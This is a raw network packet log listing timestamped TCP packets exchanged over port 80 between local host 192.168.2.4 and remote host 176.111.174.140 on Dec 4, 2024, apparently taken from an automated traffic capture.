                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.565804958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.565964937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.566063881 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.566890001 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.567024946 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.567126989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.567972898 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.568067074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.568742037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.569120884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.569319963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.569396973 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.570182085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.570317030 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.570378065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.571346045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.571423054 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.571546078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.572463036 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.572618008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.572678089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.573510885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.573697090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.573801041 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.574656963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.574690104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.574805975 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.575787067 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.575889111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.576329947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.576849937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.577013969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.577088118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.577944040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.578054905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.578267097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.579066992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.579207897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.579296112 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.580205917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.580315113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.580420971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.581331015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.581449032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.581557989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.582366943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.582480907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.583173037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.583559990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.583662033 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.583744049 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.584589005 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.584686995 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.584775925 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.585709095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.585824966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.586908102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.586977005 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.587013006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.587061882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.587914944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.588063002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.588131905 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.589068890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.589297056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.589390039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.590120077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.590221882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.590291023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.591267109 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.591372013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.591464043 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.592303991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.592444897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.593079090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.593440056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.593542099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.594233990 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.594553947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.594662905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.594746113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.595658064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.595797062 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.595858097 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.596734047 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.596848011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.597105980 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.597850084 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.597969055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.598031998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.598939896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.599016905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.599096060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.599978924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.647384882 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.734338045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.734416962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.734622955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.734843969 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.734988928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.735985994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.736053944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.736057997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.736102104 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.737082958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.737296104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.737380028 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.738199949 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.738322973 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.739288092 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.739362955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.739590883 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.739661932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.740504980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.740518093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.740612984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.741528988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.741647959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.741746902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.742594957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.742645025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.743730068 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.743854046 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.743860006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.743956089 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.744815111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.744913101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.745074034 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.746026993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.746103048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.747085094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.747169018 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.747210026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.747288942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.748172045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.748210907 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.749244928 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.749320030 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.749385118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.749481916 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.750457048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.750643015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.751576900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.751655102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.751689911 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.751729965 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.752549887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.752609015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.752794027 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.753660917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.753770113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.754829884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.754889011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.754936934 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.754982948 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.755917072 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.756019115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.756108999 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.756973028 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.757086039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.757164955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.758109093 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.758289099 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.758662939 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.759236097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.759339094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.759406090 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.760411024 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.760454893 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.760525942 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.761513948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.761595011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.761709929 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.762507915 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.762615919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.763703108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.763770103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.763798952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.763870955 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.764683962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.764796019 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.765333891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.765800953 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.765913010 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.767127037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.767218113 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.767219067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.767292023 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.768043041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.768111944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.768712044 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.769148111 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.769268990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.770220041 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.770284891 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.770296097 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.770359993 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.771395922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.771642923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.772489071 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.772550106 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.772583961 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.772650957 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.773546934 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.773658991 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.773745060 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.774657011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.774808884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.775795937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.775875092 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.775959015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.776036024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.776870966 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.777008057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.777977943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.778038025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.778187990 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.778245926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.779198885 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.779279947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.780225039 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.780284882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.780287981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.780328035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.781343937 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.781373978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.781440020 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.782463074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.782563925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.783521891 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.783584118 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.783673048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.783778906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.784641027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.784708977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.784790039 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.785743952 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.785871983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.786860943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.786906004 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.786921978 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.786982059 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.787945986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.788033962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.788737059 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.789103031 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.789180994 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.790219069 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.790286064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.790312052 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.790332079 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.791228056 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.791282892 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.792326927 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.792407036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927093983 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927227974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927417994 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927511930 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927747011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.927802086 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.928637981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.928807974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.928865910 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.929920912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.930098057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:38.930136919 CET4973880192.168.2.4176.111.174.140
